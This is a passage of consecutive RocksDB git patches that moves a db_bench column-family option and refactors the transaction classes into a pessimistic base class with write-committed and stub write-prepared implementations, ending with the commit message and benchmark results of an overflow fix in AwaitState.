+ if (histogramType != HistogramType.HISTOGRAM_ENUM_MAX) { + HistogramData data = stats.getHistogramData(histogramType); + } } System.out.println("getHistogramData() passed."); } catch (final Exception e) { From 060ccd4f84e4b266dffd3fd9e38423270fb9b422 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 2 Aug 2017 16:13:08 -0700 Subject: [PATCH 068/205] support multiple CFs with OPTIONS file Summary: Move an option necessary for running db_bench on multiple CFs into the general initialization area, so it works with both flag-based init and OPTIONS-based init. 
Closes https://github.com/facebook/rocksdb/pull/2675 Differential Revision: D5541378 Pulled By: ajkr fbshipit-source-id: 169926cb4ae95c17974f744faf7cc794d41e5c0a --- tools/db_bench_tool.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index 8f3ae353684..f0221625947 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -2856,7 +2856,6 @@ void VerifyDBFromDB(std::string& truth_db_name) { assert(db_.db == nullptr); - options.create_missing_column_families = FLAGS_num_column_families > 1; options.max_open_files = FLAGS_open_files; if (FLAGS_cost_write_buffer_to_cache || FLAGS_db_write_buffer_size != 0) { options.write_buffer_manager.reset( @@ -3203,6 +3202,7 @@ void VerifyDBFromDB(std::string& truth_db_name) { void InitializeOptionsGeneral(Options* opts) { Options& options = *opts; + options.create_missing_column_families = FLAGS_num_column_families > 1; options.statistics = dbstats; options.wal_dir = FLAGS_wal_dir; options.create_if_missing = !FLAGS_use_existing_db; From c3d5c4d38ab65e9aef713a029cb166b194b960f2 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Thu, 3 Aug 2017 08:46:47 -0700 Subject: [PATCH 069/205] Refactor TransactionImpl Summary: This patch refactors TransactionImpl by separating the logic for pessimistic concurrency control from the implementation of how to write the data to rocksdb. The existing implementation is named WriteCommittedTxnImpl as it writes committed data to the db. A template named WritePreparedTxnImpl is also added which will be later completed to provide an alternative implementation. Closes https://github.com/facebook/rocksdb/pull/2676 Differential Revision: D5549998 Pulled By: maysamyabandeh fbshipit-source-id: 16298e86b43ca4849324c1f35c731913c6d17bec --- CMakeLists.txt | 1 + db/db_impl.h | 4 +- src.mk | 1 + utilities/transactions/transaction_db_impl.cc | 16 ++-- utilities/transactions/transaction_db_impl.h | 11 ++- utilities/transactions/transaction_impl.cc | 75 +++++++++--------- utilities/transactions/transaction_impl.h | 76 ++++++++++++------- .../transactions/transaction_lock_mgr.cc | 16 ++-- utilities/transactions/transaction_lock_mgr.h | 16 ++-- .../write_prepared_transaction_impl.cc | 65 ++++++++++++++++ .../write_prepared_transaction_impl.h | 70 +++++++++++++++++ 11 files changed, 258 insertions(+), 93 deletions(-) create mode 100644 utilities/transactions/write_prepared_transaction_impl.cc create mode 100644 utilities/transactions/write_prepared_transaction_impl.h diff --git a/CMakeLists.txt b/CMakeLists.txt index bc8eb5d6152..bd7a8fbe45f 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -525,6 +525,7 @@ set(SOURCES utilities/transactions/transaction_impl.cc utilities/transactions/transaction_lock_mgr.cc utilities/transactions/transaction_util.cc + utilities/transactions/write_prepared_transaction_impl.cc utilities/ttl/db_ttl_impl.cc utilities/write_batch_with_index/write_batch_with_index.cc utilities/write_batch_with_index/write_batch_with_index_internal.cc diff --git a/db/db_impl.h b/db/db_impl.h index 7fec69cd732..3284048a688 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -631,7 +631,9 @@ class DBImpl : public DB { private: friend class DB; friend class InternalStats; - friend class TransactionImpl; + friend class PessimisticTxn; + friend class WriteCommittedTxnImpl; + friend class WritePreparedTxnImpl; #ifndef ROCKSDB_LITE friend class ForwardIterator; #endif diff --git a/src.mk b/src.mk index 81d78eb36fb..0b0d4e6ab51 100644 --- a/src.mk +++ b/src.mk
@@ -200,6 +200,7 @@ LIB_SOURCES = \ utilities/transactions/transaction_impl.cc \ utilities/transactions/transaction_lock_mgr.cc \ utilities/transactions/transaction_util.cc \ + utilities/transactions/write_prepared_transaction_impl.cc \ utilities/ttl/db_ttl_impl.cc \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/transaction_db_impl.cc index 69b5bc1ea0f..bd43b585ac6 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/transaction_db_impl.cc @@ -128,7 +128,7 @@ Transaction* TransactionDBImpl::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new TransactionImpl(this, write_options, txn_options); + return new WriteCommittedTxnImpl(this, write_options, txn_options); } } @@ -266,17 +266,17 @@ Status TransactionDBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) { return s; } -Status TransactionDBImpl::TryLock(TransactionImpl* txn, uint32_t cfh_id, +Status TransactionDBImpl::TryLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key, bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); } -void TransactionDBImpl::UnLock(TransactionImpl* txn, +void TransactionDBImpl::UnLock(PessimisticTxn* txn, const TransactionKeyMap* keys) { lock_mgr_.UnLock(txn, keys, GetEnv()); } -void TransactionDBImpl::UnLock(TransactionImpl* txn, uint32_t cfh_id, +void TransactionDBImpl::UnLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } @@ -372,7 +372,7 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not cause a deadlock. 
@@ -386,7 +386,7 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } void TransactionDBImpl::InsertExpirableTransaction(TransactionID tx_id, - TransactionImpl* tx) { + PessimisticTxn* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); @@ -405,14 +405,14 @@ bool TransactionDBImpl::TryStealingExpiredTransactionLocks( if (tx_it == expirable_transactions_map_.end()) { return true; } - TransactionImpl& tx = *(tx_it->second); + PessimisticTxn& tx = *(tx_it->second); return tx.TryStealingLocks(); } void TransactionDBImpl::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/transaction_db_impl.h b/utilities/transactions/transaction_db_impl.h index 428512e8246..dfc13fbd707 100644 --- a/utilities/transactions/transaction_db_impl.h +++ b/utilities/transactions/transaction_db_impl.h @@ -63,11 +63,11 @@ class TransactionDBImpl : public TransactionDB { using StackableDB::DropColumnFamily; virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override; - Status TryLock(TransactionImpl* txn, uint32_t cfh_id, const std::string& key, + Status TryLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key, bool exclusive); - void UnLock(TransactionImpl* txn, const TransactionKeyMap* keys); - void UnLock(TransactionImpl* txn, uint32_t cfh_id, const std::string& key); + void UnLock(PessimisticTxn* txn, const TransactionKeyMap* keys); + void UnLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key); void AddColumnFamily(const ColumnFamilyHandle* handle); @@ -78,7 +78,7 @@ class TransactionDBImpl : public TransactionDB { return txn_db_options_; } - void InsertExpirableTransaction(TransactionID tx_id, TransactionImpl* tx); + void InsertExpirableTransaction(TransactionID tx_id, PessimisticTxn* tx); void RemoveExpirableTransaction(TransactionID tx_id); // If transaction is no longer available, locks can be stolen @@ -109,13 +109,12 @@ class TransactionDBImpl : public TransactionDB { // Must be held when adding/dropping column families. InstrumentedMutex column_family_mutex_; Transaction* BeginInternalTransaction(const WriteOptions& options); - Status WriteHelper(WriteBatch* updates, TransactionImpl* txn_impl); // Used to ensure that no locks are stolen from an expirable transaction // that has started a commit. Only transactions with an expiration time // should be in this map. 
std::mutex map_mutex_; - std::unordered_map + std::unordered_map expirable_transactions_map_; // map from name to two phase transaction instance diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index dd0c69be48b..ececec6d534 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -29,31 +29,31 @@ namespace rocksdb { struct WriteOptions; -std::atomic TransactionImpl::txn_id_counter_(1); +std::atomic PessimisticTxn::txn_id_counter_(1); -TransactionID TransactionImpl::GenTxnID() { +TransactionID PessimisticTxn::GenTxnID() { return txn_id_counter_.fetch_add(1); } -TransactionImpl::TransactionImpl(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) +PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetRootDB(), write_options), txn_db_impl_(nullptr), + expiration_time_(0), txn_id_(0), waiting_cf_id_(0), waiting_key_(nullptr), - expiration_time_(0), lock_timeout_(0), deadlock_detect_(false), deadlock_detect_depth_(0) { txn_db_impl_ = static_cast_with_check(txn_db); - db_impl_ = static_cast_with_check(txn_db->GetRootDB()); + db_impl_ = static_cast_with_check(db_); Initialize(txn_options); } -void TransactionImpl::Initialize(const TransactionOptions& txn_options) { +void PessimisticTxn::Initialize(const TransactionOptions& txn_options) { txn_id_ = GenTxnID(); txn_state_ = STARTED; @@ -84,7 +84,7 @@ void TransactionImpl::Initialize(const TransactionOptions& txn_options) { } } -TransactionImpl::~TransactionImpl() { +PessimisticTxn::~PessimisticTxn() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); if (expiration_time_ > 0) { txn_db_impl_->RemoveExpirableTransaction(txn_id_); @@ -94,14 +94,14 @@ TransactionImpl::~TransactionImpl() { } } -void TransactionImpl::Clear() { +void PessimisticTxn::Clear() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); TransactionBaseImpl::Clear(); } -void TransactionImpl::Reinitialize(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) { +void PessimisticTxn::Reinitialize(TransactionDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) { if (!name_.empty() && txn_state_ != COMMITED) { txn_db_impl_->UnregisterTransaction(this); } @@ -109,7 +109,7 @@ void TransactionImpl::Reinitialize(TransactionDB* txn_db, Initialize(txn_options); } -bool TransactionImpl::IsExpired() const { +bool PessimisticTxn::IsExpired() const { if (expiration_time_ > 0) { if (db_->GetEnv()->NowMicros() >= expiration_time_) { // Transaction is expired. 
@@ -120,7 +120,12 @@ bool TransactionImpl::IsExpired() const { return false; } -Status TransactionImpl::CommitBatch(WriteBatch* batch) { +WriteCommittedTxnImpl::WriteCommittedTxnImpl( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) + : PessimisticTxn(txn_db, write_options, txn_options){}; + +Status WriteCommittedTxnImpl::CommitBatch(WriteBatch* batch) { TransactionKeyMap keys_to_unlock; Status s = LockBatch(batch, &keys_to_unlock); @@ -158,7 +163,7 @@ Status TransactionImpl::CommitBatch(WriteBatch* batch) { return s; } -Status TransactionImpl::Prepare() { +Status WriteCommittedTxnImpl::Prepare() { Status s; if (name_.empty()) { @@ -213,7 +218,7 @@ Status TransactionImpl::Prepare() { return s; } -Status TransactionImpl::Commit() { +Status WriteCommittedTxnImpl::Commit() { Status s; bool commit_single = false; bool commit_prepared = false; @@ -299,7 +304,7 @@ Status TransactionImpl::Commit() { return s; } -Status TransactionImpl::Rollback() { +Status WriteCommittedTxnImpl::Rollback() { Status s; if (txn_state_ == PREPARED) { WriteBatch rollback_marker; @@ -326,7 +331,7 @@ Status TransactionImpl::Rollback() { return s; } -Status TransactionImpl::RollbackToSavePoint() { +Status PessimisticTxn::RollbackToSavePoint() { if (txn_state_ != STARTED) { return Status::InvalidArgument("Transaction is beyond state for rollback."); } @@ -344,8 +349,8 @@ Status TransactionImpl::RollbackToSavePoint() { // Lock all keys in this batch. // On success, caller should unlock keys_to_unlock -Status TransactionImpl::LockBatch(WriteBatch* batch, - TransactionKeyMap* keys_to_unlock) { +Status PessimisticTxn::LockBatch(WriteBatch* batch, + TransactionKeyMap* keys_to_unlock) { class Handler : public WriteBatch::Handler { public: // Sorted map of column_family_id to sorted set of keys. @@ -422,9 +427,9 @@ Status TransactionImpl::LockBatch(WriteBatch* batch, // If check_shapshot is true and this transaction has a snapshot set, // this key will only be locked if there have been no writes to this key since // the snapshot time. -Status TransactionImpl::TryLock(ColumnFamilyHandle* column_family, - const Slice& key, bool read_only, - bool exclusive, bool untracked) { +Status PessimisticTxn::TryLock(ColumnFamilyHandle* column_family, + const Slice& key, bool read_only, bool exclusive, + bool untracked) { uint32_t cfh_id = GetColumnFamilyID(column_family); std::string key_str = key.ToString(); bool previously_locked; @@ -510,10 +515,10 @@ Status TransactionImpl::TryLock(ColumnFamilyHandle* column_family, // Return OK() if this key has not been modified more recently than the // transaction snapshot_. -Status TransactionImpl::ValidateSnapshot(ColumnFamilyHandle* column_family, - const Slice& key, - SequenceNumber prev_seqno, - SequenceNumber* new_seqno) { +Status PessimisticTxn::ValidateSnapshot(ColumnFamilyHandle* column_family, + const Slice& key, + SequenceNumber prev_seqno, + SequenceNumber* new_seqno) { assert(snapshot_); SequenceNumber seq = snapshot_->GetSequenceNumber(); @@ -526,29 +531,27 @@ Status TransactionImpl::ValidateSnapshot(ColumnFamilyHandle* column_family, *new_seqno = seq; - auto db_impl = static_cast_with_check(db_); - ColumnFamilyHandle* cfh = - column_family ? column_family : db_impl->DefaultColumnFamily(); + column_family ? 
column_family : db_impl_->DefaultColumnFamily(); - return TransactionUtil::CheckKeyForConflicts(db_impl, cfh, key.ToString(), + return TransactionUtil::CheckKeyForConflicts(db_impl_, cfh, key.ToString(), snapshot_->GetSequenceNumber(), false /* cache_only */); } -bool TransactionImpl::TryStealingLocks() { +bool PessimisticTxn::TryStealingLocks() { assert(IsExpired()); TransactionState expected = STARTED; return std::atomic_compare_exchange_strong(&txn_state_, &expected, LOCKS_STOLEN); } -void TransactionImpl::UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) { +void PessimisticTxn::UnlockGetForUpdate(ColumnFamilyHandle* column_family, + const Slice& key) { txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString()); } -Status TransactionImpl::SetName(const TransactionName& name) { +Status PessimisticTxn::SetName(const TransactionName& name) { Status s; if (txn_state_ == STARTED) { if (name_.length()) { diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 01f8f4b2a2d..8445b0a50ab 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -31,24 +31,28 @@ namespace rocksdb { class TransactionDBImpl; +class PessimisticTxn; -class TransactionImpl : public TransactionBaseImpl { +// A transaction under pessimistic concurrency control. This class implements +// the locking API and interfaces with the lock manager as well as the +// pessimistic transactional db. +class PessimisticTxn : public TransactionBaseImpl { public: - TransactionImpl(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + PessimisticTxn(TransactionDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); - virtual ~TransactionImpl(); + virtual ~PessimisticTxn(); void Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options); - Status Prepare() override; + Status Prepare() override = 0; - Status Commit() override; + Status Commit() override = 0; - Status CommitBatch(WriteBatch* batch); + virtual Status CommitBatch(WriteBatch* batch) = 0; - Status Rollback() override; + Status Rollback() override = 0; Status RollbackToSavePoint() override; @@ -107,14 +111,24 @@ class TransactionImpl : public TransactionBaseImpl { int64_t GetDeadlockDetectDepth() const { return deadlock_detect_depth_; } protected: + void Initialize(const TransactionOptions& txn_options); + + Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock); + Status TryLock(ColumnFamilyHandle* column_family, const Slice& key, bool read_only, bool exclusive, bool untracked = false) override; - private: + void Clear() override; + TransactionDBImpl* txn_db_impl_; DBImpl* db_impl_; + // If non-zero, this transaction should not be committed after this time (in + // microseconds according to Env->NowMicros()) + uint64_t expiration_time_; + + private: // Used to create unique ids for transactions. static std::atomic txn_id_counter_; @@ -140,10 +154,6 @@ class TransactionImpl : public TransactionBaseImpl { // Mutex protecting waiting_txn_ids_, waiting_cf_id_ and waiting_key_. mutable std::mutex wait_mutex_; - // If non-zero, this transaction should not be committed after this time (in - // microseconds according to Env->NowMicros()) - uint64_t expiration_time_; - // Timeout in microseconds when locking a key or -1 if there is no timeout. 
int64_t lock_timeout_; @@ -153,32 +163,46 @@ class TransactionImpl : public TransactionBaseImpl { // Whether to perform deadlock detection or not. int64_t deadlock_detect_depth_; - void Clear() override; - - void Initialize(const TransactionOptions& txn_options); - Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, SequenceNumber prev_seqno, SequenceNumber* new_seqno); - Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock); + void UnlockGetForUpdate(ColumnFamilyHandle* column_family, + const Slice& key) override; - Status DoCommit(WriteBatch* batch); + // No copying allowed + PessimisticTxn(const PessimisticTxn&); + void operator=(const PessimisticTxn&); +}; - void RollbackLastN(size_t num); +class WriteCommittedTxnImpl : public PessimisticTxn { + public: + WriteCommittedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); - void UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) override; + virtual ~WriteCommittedTxnImpl() {} + + Status Prepare() override; + + Status Commit() override; + + Status CommitBatch(WriteBatch* batch) override; + + Status Rollback() override; + + private: + Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, + SequenceNumber prev_seqno, SequenceNumber* new_seqno); // No copying allowed - TransactionImpl(const TransactionImpl&); - void operator=(const TransactionImpl&); + WriteCommittedTxnImpl(const WriteCommittedTxnImpl&); + void operator=(const WriteCommittedTxnImpl&); }; // Used at commit time to check whether transaction is committing before its // expiration time. class TransactionCallback : public WriteCallback { public: - explicit TransactionCallback(TransactionImpl* txn) : txn_(txn) {} + explicit TransactionCallback(PessimisticTxn* txn) : txn_(txn) {} Status Callback(DB* db) override { if (txn_->IsExpired()) { @@ -191,7 +215,7 @@ class TransactionCallback : public WriteCallback { bool AllowWriteBatching() override { return true; } private: - TransactionImpl* txn_; + PessimisticTxn* txn_; }; } // namespace rocksdb diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 1184f667d81..99e71eeb0de 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -227,7 +227,7 @@ bool TransactionLockMgr::IsLockExpired(TransactionID txn_id, return expired; } -Status TransactionLockMgr::TryLock(TransactionImpl* txn, +Status TransactionLockMgr::TryLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive) { @@ -256,7 +256,7 @@ Status TransactionLockMgr::TryLock(TransactionImpl* txn, // Helper function for TryLock(). 
Status TransactionLockMgr::AcquireWithTimeout( - TransactionImpl* txn, LockMap* lock_map, LockMapStripe* stripe, + PessimisticTxn* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info) { Status result; @@ -357,13 +357,13 @@ Status TransactionLockMgr::AcquireWithTimeout( } void TransactionLockMgr::DecrementWaiters( - const TransactionImpl* txn, const autovector& wait_ids) { + const PessimisticTxn* txn, const autovector& wait_ids) { std::lock_guard lock(wait_txn_map_mutex_); DecrementWaitersImpl(txn, wait_ids); } void TransactionLockMgr::DecrementWaitersImpl( - const TransactionImpl* txn, const autovector& wait_ids) { + const PessimisticTxn* txn, const autovector& wait_ids) { auto id = txn->GetID(); assert(wait_txn_map_.Contains(id)); wait_txn_map_.Delete(id); @@ -377,7 +377,7 @@ void TransactionLockMgr::DecrementWaitersImpl( } bool TransactionLockMgr::IncrementWaiters( - const TransactionImpl* txn, const autovector& wait_ids) { + const PessimisticTxn* txn, const autovector& wait_ids) { auto id = txn->GetID(); std::vector queue(txn->GetDeadlockDetectDepth()); std::lock_guard lock(wait_txn_map_mutex_); @@ -501,7 +501,7 @@ Status TransactionLockMgr::AcquireLocked(LockMap* lock_map, return result; } -void TransactionLockMgr::UnLockKey(const TransactionImpl* txn, +void TransactionLockMgr::UnLockKey(const PessimisticTxn* txn, const std::string& key, LockMapStripe* stripe, LockMap* lock_map, Env* env) { @@ -537,7 +537,7 @@ void TransactionLockMgr::UnLockKey(const TransactionImpl* txn, } } -void TransactionLockMgr::UnLock(TransactionImpl* txn, uint32_t column_family_id, +void TransactionLockMgr::UnLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env) { std::shared_ptr lock_map_ptr = GetLockMap(column_family_id); LockMap* lock_map = lock_map_ptr.get(); @@ -559,7 +559,7 @@ void TransactionLockMgr::UnLock(TransactionImpl* txn, uint32_t column_family_id, stripe->stripe_cv->NotifyAll(); } -void TransactionLockMgr::UnLock(const TransactionImpl* txn, +void TransactionLockMgr::UnLock(const PessimisticTxn* txn, const TransactionKeyMap* key_map, Env* env) { for (auto& key_map_iter : *key_map) { uint32_t column_family_id = key_map_iter.first; diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 6389f8d7d3d..6c0d1e99dc0 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -47,14 +47,14 @@ class TransactionLockMgr { // Attempt to lock key. If OK status is returned, the caller is responsible // for calling UnLock() on this key. - Status TryLock(TransactionImpl* txn, uint32_t column_family_id, + Status TryLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive); // Unlock a key locked by TryLock(). txn must be the same Transaction that // locked this key. 
- void UnLock(const TransactionImpl* txn, const TransactionKeyMap* keys, + void UnLock(const PessimisticTxn* txn, const TransactionKeyMap* keys, Env* env); - void UnLock(TransactionImpl* txn, uint32_t column_family_id, + void UnLock(PessimisticTxn* txn, uint32_t column_family_id, const std::string& key, Env* env); using LockStatusData = std::unordered_multimap; @@ -102,7 +102,7 @@ class TransactionLockMgr { std::shared_ptr GetLockMap(uint32_t column_family_id); - Status AcquireWithTimeout(TransactionImpl* txn, LockMap* lock_map, + Status AcquireWithTimeout(PessimisticTxn* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info); @@ -112,14 +112,14 @@ class TransactionLockMgr { const LockInfo& lock_info, uint64_t* wait_time, autovector* txn_ids); - void UnLockKey(const TransactionImpl* txn, const std::string& key, + void UnLockKey(const PessimisticTxn* txn, const std::string& key, LockMapStripe* stripe, LockMap* lock_map, Env* env); - bool IncrementWaiters(const TransactionImpl* txn, + bool IncrementWaiters(const PessimisticTxn* txn, const autovector& wait_ids); - void DecrementWaiters(const TransactionImpl* txn, + void DecrementWaiters(const PessimisticTxn* txn, const autovector& wait_ids); - void DecrementWaitersImpl(const TransactionImpl* txn, + void DecrementWaitersImpl(const PessimisticTxn* txn, const autovector& wait_ids); // No copying allowed diff --git a/utilities/transactions/write_prepared_transaction_impl.cc b/utilities/transactions/write_prepared_transaction_impl.cc new file mode 100644 index 00000000000..ded6bcb2bc6 --- /dev/null +++ b/utilities/transactions/write_prepared_transaction_impl.cc @@ -0,0 +1,65 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
+ +#ifndef ROCKSDB_LITE + +#include "utilities/transactions/write_prepared_transaction_impl.h" + +#include +#include +#include +#include + +#include "db/column_family.h" +#include "db/db_impl.h" +#include "rocksdb/comparator.h" +#include "rocksdb/db.h" +#include "rocksdb/snapshot.h" +#include "rocksdb/status.h" +#include "rocksdb/utilities/transaction_db.h" +#include "util/string_util.h" +#include "util/sync_point.h" +#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/transaction_util.h" + +namespace rocksdb { + +struct WriteOptions; + +WritePreparedTxnImpl::WritePreparedTxnImpl( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) + : PessimisticTxn(txn_db, write_options, txn_options) { + PessimisticTxn::Initialize(txn_options); +} + +Status WritePreparedTxnImpl::CommitBatch(WriteBatch* batch) { + // TODO(myabandeh) Implement this + throw std::runtime_error("CommitBatch not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxnImpl::Prepare() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Prepare not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxnImpl::Commit() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Commit not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxnImpl::Rollback() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Rollback not Implemented"); + return Status::OK(); +} + +} // namespace rocksdb + +#endif // ROCKSDB_LITE diff --git a/utilities/transactions/write_prepared_transaction_impl.h b/utilities/transactions/write_prepared_transaction_impl.h new file mode 100644 index 00000000000..eab2b8669f7 --- /dev/null +++ b/utilities/transactions/write_prepared_transaction_impl.h @@ -0,0 +1,70 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#pragma once + +#ifndef ROCKSDB_LITE + +#include +#include +#include +#include +#include +#include +#include + +#include "db/write_callback.h" +#include "rocksdb/db.h" +#include "rocksdb/slice.h" +#include "rocksdb/snapshot.h" +#include "rocksdb/status.h" +#include "rocksdb/types.h" +#include "rocksdb/utilities/transaction.h" +#include "rocksdb/utilities/transaction_db.h" +#include "rocksdb/utilities/write_batch_with_index.h" +#include "util/autovector.h" +#include "utilities/transactions/transaction_base.h" +#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/transaction_util.h" + +namespace rocksdb { + +class TransactionDBImpl; + +// This impl can also write uncommitted data to the DB and then later tell +// apart committed data from uncommitted data. Uncommitted data could be after +// the Prepare phase in 2PC (WritePreparedTxnImpl) or before that +// (WriteUnpreparedTxnImpl).
+class WritePreparedTxnImpl : public PessimisticTxn { + public: + WritePreparedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); + + virtual ~WritePreparedTxnImpl() {} + + Status Prepare() override; + + Status Commit() override; + + Status CommitBatch(WriteBatch* batch) override; + + Status Rollback() override; + + private: + // TODO(myabandeh): verify that the current impl works with values being + // written with prepare sequence number too. + // Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& + // key, + // SequenceNumber prev_seqno, SequenceNumber* + // new_seqno); + + // No copying allowed + WritePreparedTxnImpl(const WritePreparedTxnImpl&); + void operator=(const WritePreparedTxnImpl&); +}; + +} // namespace rocksdb + +#endif // ROCKSDB_LITE From 58410aee44e902735659b80364eecc0e075676e9 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Thu, 3 Aug 2017 10:36:50 -0700 Subject: [PATCH 070/205] Fix the overflow bug in AwaitState Summary: https://github.com/facebook/rocksdb/issues/2559 reports an overflow in AwaitState. nbronson has debugged the issue and presented the fix, which is applied in this patch. Moreover, this patch adds more comments to clarify the logic in AwaitState. I tried with both 16 and 64 threads on the update benchmark. The fix lowers CPU usage by 1.6% but also lowers the throughput by 1.6% and 2%, respectively. Apparently the bug had favored spinning more often. Benchmarks: TEST_TMPDIR=/dev/shm/tmpdb time ./db_bench --benchmarks="fillrandom" --threads=16 --num=2000000 TEST_TMPDIR=/dev/shm/tmpdb time ./db_bench --use_existing_db=1 --benchmarks="updaterandom[X3]" --threads=16 --num=2000000 TEST_TMPDIR=/dev/shm/tmpdb time ./db_bench --use_existing_db=1 --benchmarks="updaterandom[X3]" --threads=64 --num=200000 Results $ cat update-16t-bug.txt | tail -4 updaterandom [AVG 3 runs] : 234117 ops/sec; 51.8 MB/sec updaterandom [MEDIAN 3 runs] : 233581 ops/sec; 51.7 MB/sec 3896.42user 1539.12system 6:50.61elapsed 1323%CPU (0avgtext+0avgdata 331308maxresident)k 0inputs+0outputs (0major+1281001minor)pagefaults 0swaps $ cat update-16t-fixed.txt | tail -4 updaterandom [AVG 3 runs] : 230364 ops/sec; 51.0 MB/sec updaterandom [MEDIAN 3 runs] : 226169 ops/sec; 50.0 MB/sec 3865.46user 1568.32system 6:57.63elapsed 1301%CPU (0avgtext+0avgdata 315012maxresident)k 0inputs+0outputs (0major+1342568minor)pagefaults 0swaps $ cat update-64t-bug.txt | tail -4 updaterandom [AVG 3 runs] : 261878 ops/sec; 57.9 MB/sec updaterandom [MEDIAN 3 runs] : 262859 ops/sec; 58.2 MB/sec 926.27user 578.06system 2:27.46elapsed 1020%CPU (0avgtext+0avgdata 475480maxresident)k 0inputs+0outputs (0major+1058728minor)pagefaults 0swaps $ cat update-64t-fixed.txt | tail -4 updaterandom [AVG 3 runs] : 256699 ops/sec; 56.8 MB/sec updaterandom [MEDIAN 3 runs] : 256380 ops/sec; 56.7 MB/sec 933.47user 575.37system 2:30.41elapsed 1003%CPU (0avgtext+0avgdata 482340maxresident)k 0inputs+0outputs (0major+1078557minor)pagefaults 0swaps Closes https://github.com/facebook/rocksdb/pull/2679 